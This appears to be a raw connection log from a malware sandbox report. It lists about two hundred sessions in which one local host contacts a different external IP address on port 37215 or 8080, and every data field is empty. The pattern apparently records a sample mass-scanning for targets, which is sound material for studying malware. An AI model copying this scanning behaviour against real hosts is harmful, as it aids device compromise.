                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16568192.168.2.235428041.37.183.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16569192.168.2.2336306163.90.225.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16570192.168.2.233359041.107.114.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16571192.168.2.2358910197.249.84.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16572192.168.2.2339262157.205.27.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16573192.168.2.2343814154.170.4.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16574192.168.2.2360906111.184.29.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16575192.168.2.233737841.173.12.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16576192.168.2.2357192197.232.234.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16577192.168.2.235572234.48.28.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16578192.168.2.2337778197.209.169.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16579192.168.2.233806641.191.199.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16580192.168.2.2337076197.222.147.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16581192.168.2.2338644157.201.208.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16582192.168.2.2333896197.89.99.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16583192.168.2.235135641.70.91.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16584192.168.2.2333930197.138.0.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16585192.168.2.234588041.135.63.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16586192.168.2.2340932157.236.33.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16587192.168.2.2339050197.175.112.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16588192.168.2.235251041.102.83.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16589192.168.2.2338854218.21.199.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16590192.168.2.2352932197.114.19.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16591192.168.2.2353440157.143.177.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16592192.168.2.2355526116.144.1.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16593192.168.2.2337874197.174.144.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16594192.168.2.2344688142.190.94.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16595192.168.2.2338092157.182.201.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16596192.168.2.2355060197.117.0.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16597192.168.2.2339898139.172.41.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16598192.168.2.2358486157.35.28.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16599192.168.2.2341468157.191.178.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16600192.168.2.2336578122.126.86.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16601192.168.2.2357906157.98.89.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16602192.168.2.234440231.89.181.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16603192.168.2.2349422217.235.73.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16604192.168.2.2340950221.62.238.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16605192.168.2.2351348123.86.191.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16606192.168.2.2356962147.51.191.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16607192.168.2.233602844.39.161.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16608192.168.2.2347590108.212.46.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16609192.168.2.236099893.164.187.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16610192.168.2.2355828182.15.131.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16611192.168.2.2341836179.91.183.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16612192.168.2.234942680.177.242.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16613192.168.2.2342936137.95.128.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16614192.168.2.235977293.143.81.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16615192.168.2.2339086176.11.178.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16616192.168.2.235153849.164.137.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16617192.168.2.23480404.1.181.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16618192.168.2.234557084.86.88.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16619192.168.2.234547662.175.111.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16620192.168.2.234263074.102.0.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16621192.168.2.2352946220.99.65.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16622192.168.2.2352034175.221.63.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16623192.168.2.235867839.201.195.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16624192.168.2.2346382167.16.253.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16625192.168.2.235208443.102.29.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16626192.168.2.2343354148.93.143.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16627192.168.2.2359792134.172.218.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16628192.168.2.2352440102.156.248.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16629192.168.2.235703831.169.95.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16630192.168.2.2334986195.191.128.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16631192.168.2.235873654.42.168.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16632192.168.2.2349326139.67.5.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16633192.168.2.233836481.35.64.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16634192.168.2.234419631.35.201.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16635192.168.2.235632883.197.87.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16636192.168.2.2341358136.244.154.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16637192.168.2.235739699.31.124.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16638192.168.2.2338278217.229.29.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16639192.168.2.2354796101.235.157.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16640192.168.2.2356982202.18.205.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16641192.168.2.2357476123.164.174.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16642192.168.2.235781471.151.150.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16643192.168.2.2355776106.8.162.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16644192.168.2.235486497.255.155.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16645192.168.2.2345976173.133.145.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16646192.168.2.235614897.156.188.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16647192.168.2.2356600156.127.164.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16648192.168.2.2345698159.251.96.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16649192.168.2.2349698193.226.203.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16650192.168.2.233975690.44.222.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16651192.168.2.2353026163.227.52.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16652192.168.2.2338110191.26.178.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16653192.168.2.2353576101.185.25.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16654192.168.2.233815889.152.12.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16655192.168.2.2345040139.37.7.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16656192.168.2.23370562.236.201.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16657192.168.2.2338008158.60.197.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16658192.168.2.234373490.173.135.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16659192.168.2.2349838139.82.11.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16660192.168.2.235998873.187.157.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16661192.168.2.233713225.37.138.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16662192.168.2.234248436.34.69.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16663192.168.2.2350660130.239.219.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16664192.168.2.23605842.46.228.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16665192.168.2.234743899.44.224.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16666192.168.2.2344348211.19.23.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16667192.168.2.2345538131.97.225.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16668192.168.2.2338442103.69.36.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16669192.168.2.2353042208.25.201.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16670192.168.2.2350696118.200.130.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16671192.168.2.2342052154.233.195.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16672192.168.2.235493292.46.203.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16673192.168.2.2355408211.163.11.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16674192.168.2.2342074176.222.167.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16675192.168.2.234236661.52.2.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16676192.168.2.2352052126.39.244.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16677192.168.2.2344832165.46.198.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16678192.168.2.2348280157.131.72.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16679192.168.2.2339160206.252.159.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16680192.168.2.2333890133.194.203.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16681192.168.2.2346594152.251.51.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16682192.168.2.2337128119.69.25.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16683192.168.2.236000036.133.159.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16684192.168.2.2358936183.34.190.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16685192.168.2.235624077.46.182.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16686192.168.2.23329022.202.162.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16687192.168.2.235025040.234.84.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16688192.168.2.233888059.36.165.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16689192.168.2.234217074.102.52.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16690192.168.2.2338872172.131.127.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16691192.168.2.233719261.99.89.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16692192.168.2.2356740201.39.210.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16693192.168.2.235847273.167.113.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16694192.168.2.2347554209.176.182.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16695192.168.2.2342568173.88.33.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16696192.168.2.235606461.79.20.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16697192.168.2.2354308191.68.132.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16698192.168.2.23469922.28.60.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16699192.168.2.2334906189.77.11.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16700192.168.2.2333702155.64.201.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16701192.168.2.2346450178.230.24.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16702192.168.2.235276058.188.74.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16703192.168.2.2344262159.139.37.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16704192.168.2.23385448.9.1.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16705192.168.2.2339794148.220.227.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16706192.168.2.233481089.255.109.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16707192.168.2.234083061.157.170.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16708192.168.2.2355320138.255.44.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16709192.168.2.234171632.255.237.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16710192.168.2.2338386187.105.0.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16711192.168.2.236071292.35.237.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16712192.168.2.235385868.66.33.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16713192.168.2.234055461.44.234.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16714192.168.2.234045276.21.131.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16715192.168.2.2341308170.66.138.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16716192.168.2.235792264.77.178.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16717192.168.2.2353192163.130.132.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16718192.168.2.2351508136.173.195.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16719192.168.2.235583825.142.104.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16720192.168.2.2349238202.105.10.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16721192.168.2.2351854154.232.57.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16722192.168.2.235281678.221.244.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16723192.168.2.2359976149.193.139.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16724192.168.2.234275825.172.165.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16725192.168.2.234379469.135.76.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16726192.168.2.2346878119.87.250.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16727192.168.2.235195023.159.24.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16728192.168.2.2360770187.60.74.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16729192.168.2.2357524116.207.91.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16730192.168.2.235675653.250.59.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16731192.168.2.2360162108.253.137.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16732192.168.2.2357010107.79.116.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16733192.168.2.234133899.61.177.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16734192.168.2.235073677.245.2.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16735192.168.2.235230427.69.1.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16736192.168.2.233965837.166.12.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16737192.168.2.235242475.224.234.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16738192.168.2.2354084108.175.181.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16739192.168.2.2348156159.241.98.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16740192.168.2.2339686177.78.72.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16741192.168.2.2334812177.168.100.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16742192.168.2.2360836129.9.30.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16743192.168.2.233920218.18.63.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16744192.168.2.2348838167.249.158.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16745192.168.2.2346402124.241.116.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16746192.168.2.234714413.104.193.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16747192.168.2.2356466206.0.28.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16748192.168.2.233457872.189.186.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16749192.168.2.2333958101.37.235.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16750192.168.2.2360322221.168.232.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16751192.168.2.2348520190.4.8.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16752192.168.2.234409675.159.0.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16753192.168.2.2336392142.106.127.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16754192.168.2.235540050.108.142.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16755192.168.2.234466847.125.142.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16756192.168.2.234509617.74.197.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16757192.168.2.2349868197.41.171.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16758192.168.2.2350640197.28.225.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16759192.168.2.2334408185.113.135.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16760192.168.2.2335870197.105.218.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16761192.168.2.2346438165.110.120.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16762192.168.2.233285435.6.131.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16763192.168.2.2352088100.211.173.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16764192.168.2.234110231.192.128.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16765192.168.2.2350222194.244.104.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16766192.168.2.2348998183.103.243.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16767192.168.2.2355878152.224.15.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16768192.168.2.2345780192.90.89.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16769192.168.2.235022871.23.22.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16770192.168.2.234501685.10.255.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16771192.168.2.2342018159.220.4.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16772192.168.2.2343046141.82.162.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16773192.168.2.2338496116.252.196.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16774192.168.2.2335712200.5.61.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16775192.168.2.2345108128.252.231.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16776192.168.2.2359526155.170.133.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16777192.168.2.235490294.85.113.1988080
                                                        TimestampBytes transferredDirectionData


